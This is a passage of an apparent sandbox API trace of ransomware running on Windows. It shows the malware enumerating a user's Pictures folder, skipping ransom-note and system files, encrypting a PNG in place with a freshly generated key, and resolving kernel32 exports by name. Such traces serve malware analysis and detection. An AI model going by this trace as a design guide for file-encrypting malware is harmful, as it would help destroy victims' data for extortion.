ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0086.068] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0086.068] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0086.068] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0086.068] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0086.068] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f259f80, ftCreationTime.dwHighDateTime=0x1d4d132, ftLastAccessTime.dwLowDateTime=0x5e9897c0, ftLastAccessTime.dwHighDateTime=0x1d4ce93, ftLastWriteTime.dwLowDateTime=0x5e9897c0, ftLastWriteTime.dwHighDateTime=0x1d4ce93, nFileSizeHigh=0x0, nFileSizeLow=0x176e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IQYZN 7s2p1.png", cAlternateFileName="IQYZN7~1.PNG")) returned 1 [0086.068] lstrcmpiW (lpString1="IQYZN 7s2p1.png", lpString2="DECRYPT-FILES.txt") returned 1 [0086.068] lstrcmpiW (lpString1="IQYZN 7s2p1.png", lpString2="autorun.inf") returned 1 [0086.068] lstrcmpiW (lpString1="IQYZN 7s2p1.png", lpString2="boot.ini") returned 1 [0086.068] lstrcmpiW (lpString1="IQYZN 7s2p1.png", lpString2="desktop.ini") returned 1 [0086.068] lstrcmpiW (lpString1="IQYZN 7s2p1.png", lpString2="ntuser.dat") returned -1 [0086.068] lstrcmpiW (lpString1="IQYZN 7s2p1.png", lpString2="iconcache.db") returned 1 [0086.068] lstrcmpiW (lpString1="IQYZN 7s2p1.png", lpString2="bootsect.bak") returned 1 [0086.068] lstrcmpiW (lpString1="IQYZN 7s2p1.png", lpString2="ntuser.dat.log") returned -1 [0086.068] lstrcmpiW (lpString1="IQYZN 7s2p1.png", lpString2="thumbs.db") returned -1 [0086.068] lstrcmpiW (lpString1="IQYZN 7s2p1.png", lpString2="Bootfont.bin") returned 1 [0086.068] lstrlenW (lpString="IQYZN 7s2p1.png") returned 15 [0086.068] lstrcmpiW (lpString1="png", lpString2="lnk") returned 1 [0086.068] lstrcmpiW (lpString1="png", lpString2="exe") returned 1 [0086.068] lstrcmpiW (lpString1="png", lpString2="sys") returned -1 [0086.068] lstrcmpiW (lpString1="png", lpString2="dll") returned 1 [0086.068] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 39 [0086.068] lstrlenW (lpString="IQYZN 7s2p1.png") returned 15 [0086.068] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0086.068] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="IQYZN 7s2p1.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IQYZN 7s2p1.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IQYZN 7s2p1.png" [0086.068] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.068] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IQYZN 7s2p1.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iqyzn 7s2p1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0086.069] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=95969) returned 1 [0086.069] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0086.069] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.069] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.069] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.069] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.069] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0086.070] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0086.071] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.071] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.073] CloseHandle (hObject=0x414) returned 1 [0086.073] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.073] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0086.073] CloseHandle (hObject=0x0) returned 0 [0086.073] CloseHandle (hObject=0x410) returned 1 [0086.073] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.074] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.074] GetTickCount () returned 0x114df86 [0086.074] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.074] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.074] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.075] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.075] lstrlenA (lpString="kernel32.dll") returned 12 [0086.075] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.075] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.075] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.075] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.075] lstrlenA (lpString="ADDATOMA") returned 8 [0086.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.075] lstrlenA (lpString="ADDATOMW") returned 8 [0086.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.075] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.075] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.075] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.075] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.075] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.075] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.076] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.076] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.076] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.076] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.076] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.076] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.076] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.076] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.076] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.076] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.076] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.076] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.076] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.076] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.076] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.076] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.076] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.076] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.077] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.077] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.077] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.077] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.077] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.077] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.077] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.077] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.079] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.079] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.079] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.079] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.080] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.080] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.080] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.080] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.080] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.080] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.080] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.080] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.080] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.080] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.080] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.080] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.080] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.080] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.080] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.080] lstrlenA (lpString="BEEP") returned 4 [0086.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.080] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.080] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.081] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.081] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.081] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.081] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.081] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.081] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.081] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.081] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.081] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.081] lstrlenA (lpString="CANCELIO") returned 8 [0086.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.081] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.081] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.081] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.081] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.081] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.081] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.081] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.081] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.082] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.082] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.082] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.082] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.082] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.082] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.082] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.082] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.082] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.082] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.082] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.082] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.082] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.082] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.082] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.082] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.082] lstrlenA 